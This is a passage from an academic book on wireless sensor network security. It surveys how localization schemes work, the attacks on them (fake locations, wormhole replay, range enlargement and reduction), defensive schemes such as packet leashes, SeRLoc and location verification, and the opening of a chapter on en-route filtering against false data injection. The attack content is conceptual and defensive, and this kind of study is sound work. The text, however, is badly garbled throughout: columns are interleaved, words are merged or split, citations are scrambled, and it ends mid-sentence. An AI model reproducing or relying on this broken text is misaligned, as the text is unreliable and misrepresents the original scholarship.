other nodes to localize. Depending on the avail- (Smith et al., 2004) can also be applied to obtain
ability of such anchors, we classify the localiza- the optimal solution for sensors’ location.
tion approaches as anchor-based or anchor-free
ones. We also classify them into range-based or Anchor-based range-free
range-free ones on whether they require distance Approaches
measurements between sensors, and centralized or
distributed on whether the localization is performed Since range-based approaches require special
by a computing center or by sensors themselves. hardware to measure the distances between sen-
TheclassificationisgiveninTable,where 1 “(c)” range-free approaches attracted more
sor nodes,
means that the approach is centralized. research interests recently. In anchor-based range-
free approaches, no distance measurements are
Anchor-based range-based needed and sensors determine their locations using
Approaches the beacon messages from anchors. Both Active
Badge (Want et al., 1992) and Cricket (Priyantha et
In anchor-based localization approaches, some al., 2000) belong to this category. Centroid method
anchors are deployed whose positions are known (Bulusu et al., 2000) calculates a sensor’s loca-
from GPS device or manual configuration. tionInas the mean value of the locations of anchors
range-based approaches, the sensors’ locations are from which this sensor hears beacon messages.
determined by using trilateration technique based APIT (He et al., 2003) determines some triangles
on the distances between sensors. The trilateration in which a sensor may reside, and estimates the
method solves a set of equations and estimates sensor’s location as the overlapping region of theses
sensor’s location that best satisfy the distance con- triangles. SeRLoc (Lazos & Poovendran, 2004)
straints (according to some optimization criteria, uses sectored antennas equipped on anchors and
e.g., least square error criteria). Active Bat (Harter computes sensor’s location as the centroid of the
et al., 1999), RADAR (Bahl & Padmanabhan, overlapping region of multiple sectors. DV-hop
2000), AHLoS (Savvides et al., 2001), and SDP (Nicolescu & Nath, 2001) and DV-based AoA
(So & Yu, 2005) are all anchor-based range-based ( Nicolescu & Nath, ) 302 first obtain the hop
Table1.Classificationoflocalizationapproaches
Range-Based Range-Free
Anchor-Based Active Bat(c) (Harter et al., 1999) Active Badge(c) (Want et al., 1992)
RADAR(c) Centroid
(Bahl & Padmanabhan, 2000) (Bulusu et al., 2000)
AHLoS Cricket
(Savvides, Han, & Srivastava, 2001) (Priyantha et al., 2000)
LMS/KF (Smith et al., 2004) Convex(c)
SDP(c) (So & Yu, 2005) (Doherty et al., 2001)
DV-hop (Nicolescu & Nath, 2001)
DV-based AoA
(Nicolescu & Nath, 2003)
APIT (He et al., 2003)
Amorphous
(Nagpal, Shrobe, & Bachrach, 2003)
SeRLoc (Lazos & Poovendran, 2004)
Anchor-Free MDS-MAP(c) (Shang et al., 2003) MDS-MAP(c) (Shang et al., 2003)
Deployment Knowledge
(Fang, Du, & Ning, 2005)

countsfromsensorstoanchorsbyooding fl through
Attackers can compromise anchors or sensors
the sensor field, then estimates the and average hoplocation information. They can
send out false
distance and translates the hop-count distances jam the communications between sensors and
to real distances to determine sensors’ locations. replay the messages, which maes sensors wrongly
Amorphous (Nagpal et al., 2003) employs a similar estimatethetime-of-flightvalueandobtainwrong
strategy as DV-hop but estimates the average hop distance measurements. They can strengthen or
distance offline. Convex (Doherty et al., ) weaken 1 02 the signal strength, which also makes the
utilizes a linear programming (LP) method to sensors obtain wrong distance measurements.
solve the linear equations and obtain the optimal Finally, the attackers can use a wired link (called
solutions for the sensors’ locations. wormhole) to transmit messages received from
one location and broadcast at the other location,
Anchor-free range-based thus making sensors build nonexistent neighboring
Approaches connectivity, which results in wrong estimations
of the sensors’ locations.
There are relatively fewer anchor-free range-based We can classify the attackers into internal at-
localization approaches. One is MDS-MAP (Shang tackers and external attackers. An internal attacker
et al., 2003), which is based on multidimensional can compromise a sensor, obtain its key materials,
scaling technique to derive the locations of all and authenticate itself to others. An external at-
sensors. It can also work as a range-free approach tacker cannot obtain any cryptographic secrets or
when only using the connectivity information authenticate itself, but it can corrupt the physical
between sensors instead of the distance measure- features of the communications between sensors,
ments, which may cause some degradations of the for example, they can corrupt the distance mea-
localization performance. surements or neighboring connectivity by jamming
the communications between sensors. In Table 2,
Anchor-free range-free Approaches we list the threat models and the corresponding
attackers that can launch the threat models. We
MDS-MAP (Shang et al., 2003) is a centralized then describe them in more details in the follow-
anchor-free range-free localization approach. Be- ing subsections.
sides, Fang et al. (2005) proposed a decentralized
approach, which assumed that sensors are deployed fake location
in groups and the sensors in the same group can
land in different locations following a known prob- Fake locations information can be generated by
ability distribution. With this prior deployment the internal attackers who compromise sensors
knowledge, a sensor utilizes the observation of the and authenticate themselves as legitimate ones.
group memberships of its neighbors, and utilizes The impact of this attack is twofold. First, many
the maximum likelihood estimation method to location-based applications such as environment
determine its location. monitoring and target tracking will be fooled by
the wrong location of some specific events, for
example, high-temperature area and location of
tHrEAts to locAlIzAtIon an enemy tank. Second, other sensors’ locations
will be polluted if they refer to these fake locations
APProAcHEs
when localizing themselves.
Since sensor networks may be deployed in hostile
environments, the localization approaches are sub- wormhole
ject to many malicious attacks. In this section, we
classify and discuss the possible attacks launched WormholeattackwasfirstdiscussedbyHu,Perrig,
to the current localization approaches. and Johnson (2003). In the wormhole attack, the
0
Table2.Classificationofthreatmodels
Fake Location Wormhole Range Englargement Range Reduction
Internal Attackers X X X
External Attackers X X X
Figure 1. A wormhole attack on sensor localization
s’
R A2
s s” R
A1 C B
adversaries copy the messages heard at one loca- range Enlargement and reduction
tion and replay them at another location.
Figure 1 illustrates how a wormhole attack Therangemodificationattacksaredetrimental
can damage a sensor’s localization. As shown in range-based localization approaches.
the figure, sensor s can directly hear the beacon If) 1 ( atime-of-flightmethodisusedtoestimate
message of anchor A1, but not of anchor A2. To distance, external attackers can jam and replay the
attack the localization of s, an adversary establishes signal or transmit it through multipaths to prolong
a wormhole between position B and C, which are the transmitting time (range enlargement attack).
near A2 and s, respectively. Then, the adversary Or they can speed-up the signals to shorten the
records A2’s beacon message at position B, trans- transmitting time (range reduction attack). For
mits it through the wormhole tunnel, and replays it example, they transform the ultrasound signal into
at position C. If s determines its location only based radio frequency signal whose transmitting speed is
on A2’s beacon message, it may assume it is near faster, and transform the signal back to ultrasound
anchor A2 (at some location within the transmission and broadcast the signals at the end point. Inter-
region of A2). If it uses both messages of A1 and nal attackers can fully control the compromised
A2, it may either believe it is located somewhere sensors, thus they may hold on to the signal for a
between A1 and A2 (e.g., at location s’’) or it may short period of time before transmitting to launch
not be able to determine its location at all because a range enlargement attack. (2) If a signal strength
it is not expected to receive the beacon messages method is used to estimate distance, external
from two anchors so far away from each other. attacker can jam and strengthen or weaken the
In such a wormhole attack, the adversaries signal before replaying it; internal attackers can
do not need to compromise any sensor or anchor directly broadcast signals with strengthened or
to understand the meaning of the messages, they weakened signals.
just copy and transmit the messages through the
established wormhole tunnel to corrupt the local-
ization approaches.

A tAxonoMy of sEcurE holes and incur long processing and transmitting

MEcHAnIsMs time. A geographical packet leash is established
by calculating the distance between two sensors’
In recent years, many secure mechanisms have geographical positions. The receiver can recog-
been proposed to defend against the attacks to nize the wormhole packets that travel a distance
localization in wireless sensor networks. We longer than a certain threshold. In the temporal
provide a taxonomy in Table 3. Secure location leash, highly precise synchronization (hundreds
schemes can help the sensors to correctly local- of nanoseconds) is required, since a radio signal
izethemselves;locationverification schemes
travels can of light and the mutual distance
at the speed
detect and discard abnormal locations of sensors between sensors are of only several meters. In the
after their locations have been determined. We geographical leash, correct geographical locations
classify these secure mechanisms on whether they are necessary, thus it cannot be used to defend
use delicate hardware, directional antenna, or no against wormhole attacks that make the sensors’
special hardware. In the following subsections, we locations not trustworthy.
discuss each category of the secure mechanisms Hu and Evans (2003) utilize sector antennas
in more details. equipped on sensors to detect wormholes. They as-
sume that each antenna has N equally divided zones
secure localization schemes Against (numbered from 1 to N). A sensor listens to the
wormholes carrier in omnimode, and receives signals through
the zone in which the signal power is maximal. By
Huetal.propose
) 30 2 ( thefirstworkcalledpack using a magnetic needle, it can be ensured that the
leashes to defend against wormhole attacks. In antenna zones of the same number (e.g., zone of
their work, a temporal packet leash is established number 1) on all sensors face the same direction.
by restricting an upper bound on the lifetime of In Figure 2, we see that the signals between true
a packet. When receiving a packet, the receiver neighbors are sent and received in the opposite
checks if it has been expired and discards the ex- zones (e.g., Zone 4 and Zone 1). Therefore, if a
pired packets that are transmitted through worm- sensor receives a message in Zone i, and the mes-
TableA3. taxonomyofsecurelocalizationandlocationverificationschemes
Secure localization schemes Location verification schemes
Against wormholes Against all attacks
Distance-bounding
Delicate Packet Leashes (Brands & Chaum, 1993)
hardware (Hu et al., 2003) Claim (Sastry, Shankar, & Wagner, 2003)
required Verifiable Multilateration(L)
(Capkun & Hubaux, 2005)
Covert Base-station Capkun, Cagalj, &
Srivastava, 2006)
Sector antenna Sectored antenna
required (Hu & Evans, 2003)
SeRLoc (Lazos & Poovendran,
2004)
MMSE-Outlier (Liu, Ning, & LAD(L)
No special Du, 2005) (Du, Fang, & Ning, 2005)
hardware LMS-Outlier PLV (Ekici, McNair, & Al-Abri, 2006)
required (Li, Trappe, Zhang, & Nath,
2005)
COTA (Wei, Yu, & Guan,
2006)

sage is sent from Zone j of the sender node, and i through wormholes because the communications
and j are not opposite to each other, we can detect are unreliable in reality and the messages may
that messages may be transmitted through some need to be retransmitted multiple times before the
wormholes. Besides this basic detecting method, receiver can actually receive them.
theauthorsproposeaverified-neighbor-discovery
protocol and a strict-neighbor-discovery protocol secure localization schemes Against
to detect the sophisticated wormholes. These All Attacks
protocols require some potentialverifier to nodes
help a sensor to distinguish legitimate neighbors All malicious attacks to localization including fake
from the wormhole ones. Thus the lack - of suffi
locations, wormholes,andrangemodificationshave
cientverifiernodeswillresultinthe lostof
a common somethey all provide inconsistent
feature:
legitimate connectivity links and degradation of location references, namely, the sending sensor’s
the localization performance. location and the measured distance between the
Lazos and Poovendran (2004) propose another sender and the receiver are inconsistent. There-
secure localization scheme called SeRLoc that also fore, some experts suggested using statistical
uses sectored antennas. An anchor transmits dif- outlier-removingmethodstofilteroutinconsist
ferent beacons at each antenna sector containing references.
the anchor’s location and the angles of the antenna Liu et al. (2005) take the mean square error
boundary lines. Each sensor determines its location (MSE) as an indicator of the degree of inconsistency
as the center of gravity of the overlapping region of among location references. They propose a greedy
all sectors it hears. During this localization process, algorithm that starts with the set of all location ref-
wormholes can be detected using two properties: erences, and each time considers the subsets with
the sector uniqueness property and the communi- one fewer reference and chooses one subset with
cation range violation property. If two sectors of the least MSE as the input to the next round, until
a single anchor are heard, or if two anchors heard the MSE value drops below a reasonable thresh-
by the sensor have a mutual distance greater than old. This scheme can effectively enhance sensors’
2R (R is the communication range), the sensor attack-resistant ability, but it launches relatively
can detect that it is under wormhole attacks. After high computation overheads on sensors. Another
detecting the wormhole, the sensor broadcasts a problem is that it requires benign references to be
randomnonceandidentifiestheclosest anchor,
the majority Li, all location references, and may
among
bythefirstreply,thentakesthecenter of gravity
not work well when corrupted location references
closest to Li as its estimated location. This tech- collude together and take a larger percentage (e.g.,
nique is named attach to closer locator algorithm around 50%) among all references.
(ACLA). One problem of ACLA is that innocent Instead of identifying and eliminating inconsis-
packets may sometimes arrive later than the ones tent references before localization, Li et al. (2005)
propose a scheme that lives with these inconsistent
references and estimates reasonable locations for
Figure 2. Detect wormholes using sector anten- sensors using least median of the squares (LMS)
nas technique. LMS is one of the most commonly used
robust fitting algorithms and can tolerate up
50% outliers among the total references. Since the
exact LMS solutions are computationally prohibi-
tive, the authors adopted an efficient alterna
technique(RousseeuwLeroy, & to
) 30 2 firstget
several candidate reference subsets, then choose
the one with the least median squares to estimate
a sensor’s location.

Both of the above schemes try to prevent sen- propose the echo protocol to verify if a device is
sors from wrongly localizing themselves, however, insidesomespecificregione. ( g.a
, roomor
- afoot
when a sensor fails to filter out theball inconsistent
stadium) to facilitate location-based access
references, its corrupted location would “pollute” control. Their protocol is very simple in that the
the localization of many downstream sensors and verifier node sends a packet containing a nonce
cascade through the entire sensor network. Wei, using RF and the device echoes the packet back
Yu, and Guan (2006) propose a scheme named using ultrasound. Then by checking the packet
COTAthatusesconfidencetagstoidentify spurious
transmission time and the processing delay, the
localizations of sensors. COTA consists of a tag verifiercanverifyifthedevicelocatesinsideth
generationprocessandareferencefiltering circleprocess.
regioncenteredattheverifier.
In the tag generation phase, two methods (the sta- IfRFtime-of-flightmethodcanbeusedto - mea
tistic indicator and the geographical indicator) can sure distance, distance-bounding protocol (Brands
be used to calculate the sensors’ confidence & Chaum, 1993) tags can upper bound the measured
based on the positions of their neighbors, distance distance from one device to another. The important
measurements, and the confidence tags of their
assumption of this protocol is that the device can
neighbors. In the reference filtering bound phase, itsbad
xor processing to a few nanoseconds
referencescanbefilteredoutbycomparing and the their verifier can measure time-with nanosec
confidencetagstotheabsoluteandrelative ond precision.metrics.
Based on this distance-bounding
COTA can effectively prevent the proliferation of protocol, Capkun and Hubaux (2005) propose a
locationerrorsinthesensorfield. location verification scheme for wireless sens
networksusingaverifiablemultilateration(VM
Location Verification Schemes technique. The rationale behind VM technique is
that when a sensor claims to locate somewhere
Although many secure localization schemes have within a triangle region formed by three veri-
been proposed to provide robust localization per- fiers, then its location can be verified only when
formance, they require special hardware or assume allthreedistancesfromthesensortotheveri
some limitations on the adversaries’ abilities, and are consistent with the calculated ones. The limita-
cannot guarantee that all sensors can calculate tions of the VM technique are the requirement of
correct location estimations. Moreover, a compro- delicate hardware to perform distance-bounding
mised sensor (internal attacker) can directly report protocol and the requirement of dense deployment
corrupted locations to the base station; meanwhile ofverifiers.
it provides a correct location to its neighbors and Lazos, Poovendran, and Capkun (2005) propose
cannot be detected. These corrupted locations asecurelocalizationandverificationsystemcall
can cause severe consequences to many location- ROPE, which combines the secure properties of
based applications. For example, wrong locations the verifiable multilateration technique Cap (
of enemy force will make the surveillance center & Hubaux, 2005) and SeRLoc (Lazos & Pooven-
not able to locate or track the real target, and thus dran, 2004).
thelocationverificationisanecessaryCapkun second-line et al. 026)( propose a verification
to defend against the adversaries. Note that some scheme using covert base stations. The covert
verification schemes can also be usedbase as secure
stations (CBS) are silent to the on-going
localization schemes if sensors’ locations have not communications and their positions are only
been determined, and we denote them by “(L)” known to the verification infrastructure. Upon
in Table 3. receiving location messages from a sensor, several
CBS cooperate (through wired links) and check
Verification Using Special Hardware if their location is consistent with the difference
of time-of-arrival to each CBS. Because sensors
Thelocationverificationproblem-wasdo first intro
not know the positions of CBS, their success
duced by Sastry et al. (2003), where the authors rate to achieve consistency through guessing is

very small. A mobile base station (MBS) can also estimate false hop counts from them to the anchor,
playtheroleofverifier,bysendingaverification resulting in a biased estimation of the average
request from one location, moving, and waiting for hop-distance.
the response at a different location. Therefore, at Anotherissueisthatcurrentlocationverifica
thetimeofperformingverification,asensor schemesdoes
either verify if a sensor exactly locates at
not know the positions of the MBS. its claimed location, or verify if it locates within
the anomaly degree of its true location. However,
Verification Without Special Hardware verificationregionscanbearbitraryandshouldb
relatedtothespecificapplication.Forexample,in
Unlike other verification schemes that use
a military some
surveillance application, the monitoring
special hardware, Du et al. (2005) propose a scheme center decides to project a missile at the location
that verifies sensors’ locations byreported checking by thethe
sensor who detects the enemy force,
consistency of the locations with the deployment thus it should determine a specific verificatio
knowledge. They assume that all sensors are de- region in which the detecting sensor should reside
ployed in groups (each group has a unique group to guarantee that the target can be destroyed.
ID) following a known probability distribution.
Asensor’slocationcanbeverifiedonlywhenits
neighborhood observation is consistent with that conclusIon
derived from the deployment knowledge. The
difference between this scheme and the previous In this chapter, we provide a taxonomy of the
works is that in this scheme, the sensors are veri- research efforts devoted to secure localization in
fiediftheirlocationsarewithinananomaly wirelessdegree
sensor networks. We classify them into
from their true locations, rather than exactly at the secure localization schemes that aim to provide
true locations. correct location estimations for sensors at the
Recently, Ekici et al. (2006) proposed proba- front-line, and location verification schemes th
bilisticalocationverification(PLV)algorithm aim to detect toabnormal locations of sensors at the
verify sensors’ locations in densely deployed sensor second-line, that is, after sensors’ locations have
networks. PLV explores the probabilistic relation been determined using any other (insecure or se-
between the number of hops a packet traverses to cure) localization approaches. We also classify the
reach a destination and the Euclidean distance be- security localization mechanisms on whether they
tweensourceanddestination.Thenthe verifier
require canhardware. Generally, localiza-
any special
determine plausibility (between 0 and 1) and create tion for sensor networks becomes more robust
a trust level for each sensor’s location claim. with the availability of more advanced hardware,
for example, sectored antennas, fast processing
hardware, or even nanosecond-precision clocks.
futurE trEnds If there is no such special hardware, other infor-
mation such as deployment knowledge is needed
Although various secure mechanisms have been to detect the inconsistent information injected by
proposed for localization in wireless sensor adversaries.
networks, there is still a large space for future
improvements.
First, very few works have been done to se- rEfErEncEs
cure range-free localization approaches which
deserve more research efforts. For example, in Bahl, P., & Padmanabhan, V. N. (2000). RADAR:
DV-hop approach, if the adversaries compromise An in-building RF-based user location and tracking
a single node and send out a false hop count, then system. Paper presented at the IEEE Conference on
all down-steaming nodes will be influenced Computerand Communications (INFOCOM).

Brands, S., & Chaum, D. (1993). Distance-bounding the Annual International Conference on Mobile
protocols. Theory and application of cryptographic Computing and Networking (ACM Mobicom).
techniques (pp. 344-359).
Hu, L., & Evans, D. (2003). Using directional anten-
Bulusu, N., Heidemann, J., & Estrin, D. (2000). nas to prevent wormhole attacks. In Proceedings of
GPS-less low cost outdoor localization for very the 11th Network and Distributed System Security
small devices. IEEE Personal Communications, Symposium (pp. 131-141).
7(5), 284.
Hu, Y., Perrig, A., & Johnson, D. (2003). Packet
Capkun, S., Cagalj, M., & Srivastava, M. (2006). leashes: A defense against wormhole attacks in
Secure localization with hidden and mobile base wireless ad hoc networks. Paper presented at the
stations. Paper presented at the IEEE Conference IEEE Conference on Computer Communications
on Computer Communications (INFOCOM). (INFOCOM).
Capkun, S., & Hubaux, J. (2005). Secure position- Lazos, L., & Poovendran, R. (2004). SeRLoc:
ing of wireless devices with application to sensor Secure range-independent localization for wire-
networks. Paper presented at the IEEE Conference less sensor networks. Paper presented at the ACM
on Computer Communications (INFOCOM). Workshop on Wireless Security.
Doherty, L., Pister, K. S., & Ghaoui, L. (2001). Lazos, L., Poovendran, R., & Capkun, S. (2005).
Convex position estimation in wireless sensor Rope: Robust position estimation in wireless sensor
networks. Paper presented at the IEEE Conference networks. Paper presented at the ACM/IEEE Infor-
on Computer Communications (INFOCOM). mation Processing in Sensor Networks (IPSN).
Du, W., Fang, L., & Ning, P. (2005). LAD: Lo- Li, Z., Trappe, W., Zhang, Y., & Nath, B. (2005).
calization anomaly detection for wireless sensor Robust statistical methods for securing wireless
networks. In Proceedings of IEEE International localization in sensor networks. Paper presented at
Parallel and Distributed Processing Symposium the ACM/IEEE Information Processing in Sensor
(IPDPS). Networks (IPSN).
Ekici, E., McNair, J., & Al-Abri, D. (2006). A Liu, D., Ning, P., & Du, W. (2005). Attack-resistant
probabilistic approach to locationlocation verification
estimationinin sensor networks. Paper pre-
wireless sensor networks. In Proceedings of IEEE sented at the ACM/IEEE Information Processing
International Conference on Communications in Sensor Networks (IPSN).
(ICC).
Nagpal, R., Shrobe, H., & Bachrach, J. (2003).
Fang, L., Du, W., & Ning, P. (2005). A beacon-less Organizing a global coordinate system from local
location discovery scheme for wireless sensor net- information on an ad hoc sensor network. Paper
works. Paper presented at the IEEE Conference on presented at the ACM/IEEE Information Process-
Computer Communications (INFOCOM). ing in Sensor Networks (IPSN).
Harter, A., Hopper, A., Steggles, P., Ward, A., Nicolescu, D., & Nath, B. (2001). Ad-hoc posi-
& Webster, P. (1999). The anatomy of a context- tioning systems (APS). Paper presented at the
aware application. Paper presented at the Annual IEEE Global Telecommunications Conference
International Conference on Mobile Computing (GLOBECOM).
and Networking (ACM Mobicom).
Nicolescu, D., & Nath, B. (2003). Ad hoc position-
He, T., Huang, C., Blum, B., Stankovic, J., & Abdel- ing system (APS) using AoA. Paper presented at the
zaher, T. (2003). Range-free localization schemes IEEE Conference on Computer Communications
in large scale sensor network. Paper presented at (INFOCOM).

Priyantha, N., Chakraborty, A., & Balakrishnan, sensor networks. In Proceedings of IEEE/ACM
H. (2000). The cricket location-support system. International Conference on Distributed Comput-
Paper presented at the Annual International Con- ing in Sensor Systems (DCOSS).
ference on Mobile Computing and Networking
(ACM Mobicom).
Rousseeuw, P., & Leroy, A. (2003). Robust regres- kEy tErMs
sion and outlier detection. John Wiley & Sons,
Inc. Anchors: Anchors are special sensors that
know their locations before localization through a
Sastry, N., Shankar, U., & Wagner, D. (2003).
GPS device equipped on them or through manual
Secure verification of location Paperclaims.
configurations.
presented at the ACM Workshop on Wireless
Security (WiSe). Localization: Localization in wireless sensor
networks is the process that all sensors obtain their
Savvides, A., Han, C.-C., & Srivastava, M. (2001).
relative or absolute locations, by themselves or by
Dynamicfine-grainedlocalizationin-ad-hocnet
network computing center.
works of sensors. Paper presented at the Annual
International Conference on Mobile Computing Location Verification:Locationverificationin
and Networking (ACM Mobicom). wireless sensor networks is the process that cor-
rectlyestimatedlocationsofsensorscanbeveri
Shang, Y., Ruml, W., Zhang, Y., & Fromherz,
and corrupted locations can be detected.
M. (2003). Localization from mere connectivity.
Paper presented at The ACM International Sym- Range-Based/Range-Free: A localization
posium on Mobile Ad Hoc Networking and Com- approach is range-based (or range-free) if it does
puting (MobiHoc). (or does not) use the measured distance between
sensors to estimation their locations.
Smith, A., Balakrishnan, H., Goraczko, M.,
& Priyantha, N. (2004). Tracking moving de- Secure Localization: Secure localization in
vices with the Cricket location system. Paper wireless sensor networks is the process that sen-
presented at the International Conference on sors can obtain their locations in the presence of
Mobile Systems, Applications, and Services malicious attacks.
(MobiSys).
Wireless Sensor Network (WSN): A wireless
So, A., & Yu, Y. (2005). Theory of semidefite sensor network (WSN) is a wireless network con-
programming for sensor network localization. sisting of autonomous devices that cooperatively
Paper presented at the ACM-SIAM Symposium monitor environmental conditions, such as tem-
on Discrete Algorithms (SODA). perature, sound, pollutants, and so forth.
Want, R., Hopper, A., Falcao, V., & Gibbons, J. Wormholes: Wormholes in wireless sensor
(1992). The active badge location system. ACM networks are nonexisting communication tunnels
Transactions on Information Systems, 10(1), 91- (usually wired links) created by adversaries. The
102. messages received at one end of a wormhole can
be transmitted through the tunnel, and broadcasted
Wei, Y., Yu, Z., & Guan, Y. (2006). COTA: A
at the other end.
robust multi-hop localization scheme in wireless

Chapter XXXVIII
Resilience Against False Data
Injection Attack in Wireless
Sensor Networks
Miao Ma
The Hong Kong University of Science and Technology, Hong Kong
AbstrAct
One of the severe security threats in wireless sensor network is false data injection attack, that is, the
compromised sensors forge the events that do not occur. To defend against false data injection attack,
sixen-routefilteringschemesinahomogeneoussensornetworkaredescribed.Furtherm
filteringschemeinaheterogeneoussensornetworkisalsopresented.We - findthatdepl
neous nodes in a sensor network is an attractive approach because of its potential to increase network
lifetime, reliability, and resiliency.
IntroductIon topology change, limited power resource, and

limited computation capacity, restricted memory
Wireless sensor networks (WSN) usually consist space. These unique characteristics and constraints
of a large number of inexpensive and small nodes present many new challenges to the design and
with sensing, data processing, and communication implementation of WSN.
capabilities. These nodes are densely deployed in a For many mission-critical applications, the sen-
region of interest and collaborate to accomplish a sor nodes are deployed in an unattended or often
common task, such as environmental monitoring, hostile environment and WSN face many security
military surveillance, and industry process control. and privacy challenges. One challenge is that when
Distinguished from traditional wireless networks deployed in hostile environments, sensor nodes may
and ad hoc networks, WSN are featured in dense be captured or compromised by the adversaries.
node deployment, unreliable sensor node, frequent Then the adversaries can obtain the secret keys
Resilience Against False Data Injection Attack in Wireless Sensor Networks
stored in the compromised nodes, and misuse them happens it can be detected by multiple sensors.
to launch insider attacks. Therefore, a nonresilient However, it is inefficient and also unnecessary
security protection scheme will exhibit a threshold for every sensor node to report their raw data to
breakdown problem. That is, the design is secure the sink node, because: (1) every data packet usu-
against t or less compromised nodes, but once ally needs to travel many hops (e.g., tens or event
more than t nodes are compromised the security longer) to reach the sink; (2) each sensor node is
design completely breaks down, where tisafixed often constrained by scarce resources in memory,
threshold. Since in reality nobody can prevent an computation, communication, and battery; and (3)
attacker from compromising more than t nodes, in many cases there is high redundancy in the raw
such a security protection solution cannot meet the data. Hence, raw data are often fused and aggre-
resilience requirement. Our expectation in terms gated locally, and only the aggregated information
of resilience is that, compromising t nodes in a is returned to the sink. In such a setting, certain
certain area can only enable an adversary to forge nodes in the sensor network will function as cluster
nonexistingeventsinthatspecificarea, headsrather
(CHs), tothan
collect the raw sensing data from
any other location at all. Put in other words, for an the sensors, process it locally, and return the ag-
attacker, the only way to generate a valid report on gregation report to the sink. Once the sink receives
a nonexisting event happening in a certain area is an event report, it may take action accordingly.
to compromise t nodes in that area. Unfortunately, the above event detection and
In this chapter, we overview several schemes reporting process can be seriously threatened by
that have been proposed to defend against compro- false data injection attacks. As we stated above,
mised nodes. We will show that several schemes sensors are usually deployed in unattended or
areonlyresilientagainstasmall,fixed number
even hostile of
environments, and an adversary may
compromised nodes with threshold breakdown capture or compromise sensor nodes. Once this
problems, while subsequent schemes partially happens, the compromised nodes can easily inject
and completely solve the threshold breakdown false data reports of nonexisting events. Even
problems. worse, when an adversary compromises more
The rest of this chapter is organized as follows. nodes and combines all the obtained secret keys,
In the next section, we introduce the background. the adversary can freely forge the event reports
Several en-route filtering schemes - inwhich
a homoge
not only “happen” at the locations where
neous sensor network are presented. Furthermore, the nodes are compromised, but also at arbitrary
asinkfilteringschemeinaheterogeneous locationssensor inthefield.Thesefabricatedreportsn
network is shown. Finally, the last section concludes only produce false alarms (and lead to false posi-
the chapter. tives), but also waste valuable network resources,
such as energy and bandwidth, when delivering the
forged reports to the base station. Therefore, it is
bAckground importanttodesignaneffectivefilteringschem
to defend against such attacks and minimize their
false data Injection Attacks impacts.
In this chapter, we consider the following threat
We consider a sensor network, which consist of model. The attacker may compromise multiple sen-
hundreds or thousands of low-cost sensors. Each sor nodes in the network, but cannot compromise
sensor senses and collects data from the environ- the sink. Once a sensor node is compromised,
ment. There is at least one base station (or sink), the attacker can obtain all secret keys, data, and
which is typically a resource-abundant computer codes stored in the sensor. Whenever more nodes
equippedwithsufficientcomputationare and storage the attacker can combine all the
compromised,
capabilities. We assume that the sensor nodes are secret keys that have obtained, and can also load a
deployed in a high density, so that once an event compromised node with the secret keys obtained

from other compromised nodes. We also assume metric secret keys, and the MAC is generated by
that the attacker cannot successfully compromise using one of the secret keys.
a node during the short deployment phase.
Besides report fabrication attack, there are En-Route Filtering
various other attacks in wireless sensor networks.
For example, a compromised node may simply not By using a suitable key assignment scheme, any
report an event that occurs (which leads to false intermediate node is able to verify the report with
negative), or a compromised node replays a legiti- certain probability or deterministically. Whenever
mate report, and so forth. However, these threats anintermediatenodereceivesareport,itfirstche
are addressed in other related work and not the whether the report carries m distinct MACs; it then
focus of this chapter. Instead, in this chapter we check if itself stores a same key with the sensing
overview several schemes that have been proposed node. If yes, it checks whether the carried MAC
to reduce false positive, that is, prevent an attacker is the same as the MAC it computes via its locally
from fabricating reports about events that do not stored key. It drops the report when any of these
occur. Two main design goals of these schemes checks fails. Otherwise (i.e., it does not have any
are summarized as follows: of the keys or the MACs are correct), it forwards
thereportsasusual.Noticethatthoughthefilte
1. Resilience against a large number of com- power of any single node is limited, the collec-
promised nodes: A good protection scheme is tive filtering power along the forwarding path is
expected to degrade gracefully as the number significant.Themorehopsaforgedreporttravels,
of compromised sensor increases, without the the higher chance it is dropped en-route.
threshold breakdown problem.
2. Adaptive to dynamic topology: The scheme Sink Verification
can deal with dynamic topology of sensor
networks and is scalable for large-scale sen- Theen-routefilteringperformedbythe - intermedi
sor networks. ate nodes may be probabilistic in nature, thus cannot
guarantee to detect and drop all forged reports.
En-route filtering framework The sink serves as the final guard in rejecting
any escaping ones. Because the sink knows all the
Statisticen-routefilteringmechanism keys,SEF)
( it(Ye,
can verify each MAC carried in a report.
Luo,Lu,Zhang,
& is
)024 thefirsteffortthatad - On the basis of the number of correct MACs each
dresses false data injection attacks in the presence report carries, the sink decides whether to accept
ofcompromisedsensors,whereanen-route thefiltering
event or not.
framework was originally proposed. The en-route Besides a SEF scheme, five more designs
filteringframeworkhasthreecomponents: includingreportinterleaved hop-by-hop authentication
generation using message authentication codes (IHA) (Zhu, Setia, Jajodia, & Ning, 2004), com-
(MACs),en-routefiltering,andsinkverification. mutative cipher-based en-route filtering CCEF) (
(Yang & Lu, 2004), location-based resilient security
Report Generation Using MACs (LBRS) (Yang, Ye, Yuan, Lu, & Arbaugh, 2005),
location-aware end-to-end data security (LEDS)
To generate a valid report, multiple (say m, where (Ren, Lou, & Zhang, 2006), and dynamic en-route
m > 1) nodes detect the event simultaneously and filtering(DEF)(YuGuan, & are
0 2 6) allspecific
agree on the content of the event report. To be instances within the above framework. Based on
forwarded by intermediate nodes and accepted by the above framework, these five proposals have
the sink, each valid report must carry m MACs; adopted different key management schemes, which
each MAC is generated by the sensing node that immediately lead to different resilience behavior of
detects the event. Each sensor stores a few sym- their designs. We will describe their methodologies
in details in the subsequent sections.
0
scHEMEs In En-routE fIltErIng is a design parameter. Each cluster head discovers

frAMEwork a path to the sink. Along the path, two nodes that
are (t + 1) hops away are associated by establish-
statistic En-route filtering ing a pair-wise key. Upon an event, each detecting
node computes two MACs, one using its key shared
Methodology with the sink and the other using its pair-wise key
shared with its downstream associated node. The
Instatisticen-routefiltering(Yeetal. cluster
there
, )0 2 4 , headsendsoutafinalreportthatcarrie
is a global key pool which is divided into multiple MACs from ( t+ 1) detecting nodes. In the en-route
T nonoverlapping partitions. Before deployment, filtering phase, eachforwardingnodeverifiesthe
each node randomly selects a few keys from a single MAC from its upstream associated node. Upon
partition, and is then loaded with these keys and successful verification, it replaces the old MAC
associated key indices. Once an event occurs, each with a new one using its pair-wise key shared with
sensing node generates a MAC by using a key in its downstream associated node. The sink performs
a different partition. The cluster head (CH) node afinalverificationonthereport.IHAguarantees
collects the MACs and attaches them to the report. that if no more than t nodes are compromised,
Any intermediate node has a same predetermined the base station will detect any false data packets
probability to detect and filter false injected by the compromised
reports, and sensors.
henceSEFfilterstheforgedreportsen-routeina
probabilistic manner. The sink can always verify Features
every report because it knows the entire key pool.
As a result, most of the forged reports are quickly First, IHA suffers from threshold breakdown
